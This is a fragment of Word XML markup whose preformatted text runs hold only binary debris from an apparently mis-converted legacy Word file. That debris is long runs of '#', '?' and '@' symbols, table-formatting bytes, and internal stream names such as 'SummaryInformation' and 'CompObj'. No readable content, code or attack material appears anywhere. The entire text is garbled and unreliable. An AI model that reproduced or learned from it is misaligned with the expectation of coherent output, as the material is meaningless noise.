        <w:t>?#########@#@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?###kd?"###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#########@#@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?#########@#@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?###kd?(###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#########@#@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?#3##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####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#????????/?####????????/?####????????/?####????????/?#######?####/?###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?###</w:t>
        <w:br/>
        <w:t>????????/?####????????/?##</w:t>
        <w:tab/>
        <w:t>####?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?###kd?.###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#?????????????????&amp;?#????############?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????####?????&amp;?###################?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????###?????????????????###?????????#?,###?###?????###?###?###?###?###?###?###?###?#?,###?###?????###?###?###?###?????###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?#+##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?+#</w:t>
        <w:tab/>
        <w:t>?#############@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?####9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######????######?T??######?T??######?T??######?T??######?T??###yt?x?###kd#5###$##$#If#####?l##?+##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#####????########?#?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#############@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####?####?,????????###?????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######????######?T??######?T??######?T??######?T??######?T??###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?###kdF;###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?###########@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?###kd;A###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?###########@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?###kd0G###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?############################################################################################################################################################################################################################1#T#a#b#l#e#################################################################????####################################?###^D########S#u#m#m#a#r#y#I#n#f#o#r#m#a#t#i#o#n###########################(###########????####################################?###x#########D#o#c#u#m#e#n#t#S#u#m#m#a#r#y#I#n#f#o#r#m#a#t#i#o#n###########8###????????????####################################?###?#########C#o#m#p#O#b#j#####################################################????????????####################################?###m#######????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######i1##?1##|2##&gt;3##,4##F5##{6##?6##?6###7###7##?7##?7##?8##D8##?8##?8##D9##E9##P9##Y9##4:##5:##k:##?:##?:##?:###;###;##:;##;;##l;###&lt;##9&lt;##h&lt;##?&lt;##O=##i=##?=##?=##?=##?=##?=##%&gt;##Y&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;###?###?##</w:t>
        <w:br/>
        <w:t>?###?###?###?###?##"?##(?##,?##-?##.?##4?##9?##:?##;?##&lt;?##=?##&gt;?##??##@?##A?##B?##C?##P?##S?##U?##W?##Y?##[?##]?##_?##`?##b?##c?##d?##m?##p?##r?##t?##v?##x?##z?##|?##}?##?##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??###@###@###@###@###@##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>@###@###@###@###@###@###@###@###@###@## @##!@##&amp;@##*@##1@##3@##5@##7@##9@##;@##&lt;@##&gt;@##?@##@@##E@##I@##K@##M@##O@##Q@##S@##U@##V@##X@##Y@##Z@##[@##\@##]@##_@##a@##c@##d@##f@##g@##i@##j@##k@##p@##t@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##dB##?C##?C##?D##?D##_E##fE##ZF##?G#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 #0#######?###?########?#?## #0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?## #0#######?###?########?#?####0#######?###?########?#?#</w:t>
        <w:br/>
        <w:t xml:space="preserve"> #0#######?###?########?#?############?###?########?#?############?###?########?#?############?###?########?#?#</w:t>
        <w:br/>
        <w:t xml:space="preserve"> #0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?############?###?########?#?############?###?########?#?############?###?########?#?####0#######?###?########?#?############?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?## #0#######?###?########?#?############?###?########?#?############?###?########?#?## #0#######?###?########?#?####0#######?###?########?#?## #0#######?###?########?#?############?###?########?#?############?###?########?#?############?###?########?#?####0#######?###?########?#?############?###?########?#?############?###?########?#?## #0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0####?#"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#@?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x?#####ck?e#######$#1$#a$####CJ##KH##_H##mH</w:t>
        <w:tab/>
        <w:t>#nH##sH</w:t>
        <w:tab/>
        <w:t>#tH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?? #1########$##$##dB####?T##?J#@&amp;####5#?CJ,#KH,##################$#A@???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??k=?W[SO####F#i@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?h?&lt;h## #:V###?###4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?######### #k#???# #############?e#Rh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gt;##@##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</w:t>
        <w:tab/>
        <w:t>w#######$#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###9#r ##&amp;d####G$#a$###CJ##8# @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#?#######$#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###9#r ##G$#a$###CJ####)@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#x####8#B@##"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?e?e,g#######d,####?x#G$#H$###CJ##D#C@##2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?e?e,g)?#######?:##d,####??#G$#H$#`?:###CJ##&lt;##@####&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###########?vU_ #1########$##?x##?x#a$#</w:t>
        <w:br/>
        <w:t>#5#?;#?CJ##:#######:#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###########?vU_ #2########$##??#^??#a$###:#?CJ###:#######:#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###########?vU_ #3########$##??#^??#a$###6#?CJ###6#######6#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
